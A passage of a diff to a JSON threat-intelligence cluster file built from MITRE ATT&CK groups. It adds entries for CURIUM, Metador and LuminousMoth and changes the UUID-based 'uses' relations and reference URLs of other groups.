- "type": "uses"
- },
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "24769ab5-14bd-4f4e-a752-cfb185da53ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "32f49626-87f4-4d6c-8f59-a0dca953fe26",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "359b00ad-9425-420b-bba5-6de8d600cbc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4efc3e00-72f2-466a-ab7c-8a7dc6603b19",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5c747acd-47f0-4c5a-b9e5-213541fc01e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "899ce53f-13a0-479b-a0e4-67d46e241542",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "revoked-by"
- },
- {
- "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "979adb5a-dc30-48f0-9e3d-9a26d866928c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "a7881f21-e978-4fe4-af56-92c9416a2616",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "a8839c95-029f-44cf-8f3d-a3cf2039e927",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bf48e7f8-752c-4ce8-bf8f-748edacd8fa6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "c3c8c916-2f3c-4e71-94b2-240bdfc996f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e74de37c-a829-446c-937d-56a44f0e9306",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f59508a6-3615-47c3-b493-6676e1a39a87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "dc5e2999-ca1a-47d4-8d12-a6984b138a1b",
@@ -29051,13 +28182,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"tags": [
@@ -29079,6 +28203,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -29104,6 +28235,51 @@
"uuid": "94873029-f950-4268-9cfd-5032e15cb182",
"value": "TA551 - G0127"
},
+ {
+ "description": "[CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)",
+ "meta": {
+ "external_id": "G1012",
+ "refs": [
+ "https://attack.mitre.org/groups/G1012",
+ "https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021"
+ ],
+ "synonyms": [
+ "CURIUM"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1ccd744-3f78-4a0e-9bb2-2002057f7928",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "3ea7add5-5b8f-45d8-b1f1-905d2729d62a",
+ "value": "CURIUM - G1012"
+ },
{
"description": "[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)",
"meta": {
@@ -29198,6 +28374,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3dada716-34c3-506e-aa3a-1889bd975b4b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
"tags": [
@@ -29282,6 +28465,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -29330,13 +28520,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "3dada716-34c3-506e-aa3a-1889bd975b4b",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "3fc023b2-c5cc-481d-9c3e-70141ae1a87e",
@@ -29607,13 +28790,107 @@
"uuid": "afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
"value": "Windshift - G0112"
},
+ {
+ "description": "[Metador](https://attack.mitre.org/groups/G1013) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://attack.mitre.org/groups/G1013) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://attack.mitre.org/groups/G1013) based on the \"I am meta\" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.(Citation: SentinelLabs Metador Sept 2022)",
+ "meta": {
+ "external_id": "G1013",
+ "refs": [
+ "https://assets.sentinelone.com/sentinellabs22/metador#page=1",
+ "https://attack.mitre.org/groups/G1013"
+ ],
+ "synonyms": [
+ "Metador"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3be1fb7a-0f7e-415e-8e3a-74a80d596e68",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df350889-4de9-44e5-8cb3-888b8343e97c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "bfc5ddb3-4dfb-4278-8928-020e1b3feddd",
+ "value": "Metador - G1013"
+ },
{
"description": "[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)",
"meta": {
"external_id": "G0114",
"refs": [
"https://attack.mitre.org/groups/G0114",
- "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf",
+ "https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf",
"https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/"
],
"synonyms": [
@@ -29908,13 +29185,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -29985,6 +29255,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -30095,6 +29372,234 @@
"uuid": "99910207-1741-4da1-9b5d-537410186b51",
"value": "Gelsemium - G0141"
},
+ {
+ "description": "[LuminousMoth](https://attack.mitre.org/groups/G1014) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://attack.mitre.org/groups/G1014) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://attack.mitre.org/groups/G1014) and [Mustang Panda](https://attack.mitre.org/groups/G0129) based on similar targeting and TTPs, as well as network infrastructure overlaps.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)",
+ "meta": {
+ "external_id": "G1014",
+ "refs": [
+ "https://attack.mitre.org/groups/G1014",
+ "https://securelist.com/apt-luminousmoth/103332/",
+ "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited"
+ ],
+ "synonyms": [
+ "LuminousMoth"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "19401639-28d0-4c3c-adcc-bc2ba22f6421",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "31fe0ba2-62fd-4fd9-9293-4043d84f7fe9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ee16395-03f0-4690-a32e-69ce9ada0f9e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "84ae8255-b4f4-4237-b5c5-e717405a9701",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a7881f21-e978-4fe4-af56-92c9416a2616",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cabe189c-a0e3-4965-a473-dcff00f17213",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "b7f627e2-0817-4cd5-8d50-e75f8aa85cc6",
+ "value": "LuminousMoth - G1014"
+ },
{
"description": "[CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)",
"meta": {
@@ -30367,6 +29872,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
"tags": [
@@ -30388,6 +29900,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
"tags": [
@@ -30395,6 +29914,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
"tags": [
@@ -30437,6 +29963,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177",
"tags": [
@@ -30458,6 +29991,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "88d31120-5bc7-4ce3-a9c0-7cf147be8e54",
"tags": [
@@ -30465,6 +30005,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
"tags": [
@@ -30486,6 +30033,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -30507,6 +30061,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -30514,6 +30075,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -30521,6 +30089,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
"tags": [
@@ -30804,6 +30379,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
"tags": [
@@ -31213,7 +30795,7 @@
"meta": {
"external_id": "G0138",
"refs": [
- "http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf",
+ "http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf",
"http://www.issuemakerslab.com/research3/",
"https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/",
"https://attack.mitre.org/groups/G0138",
@@ -31525,6 +31107,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
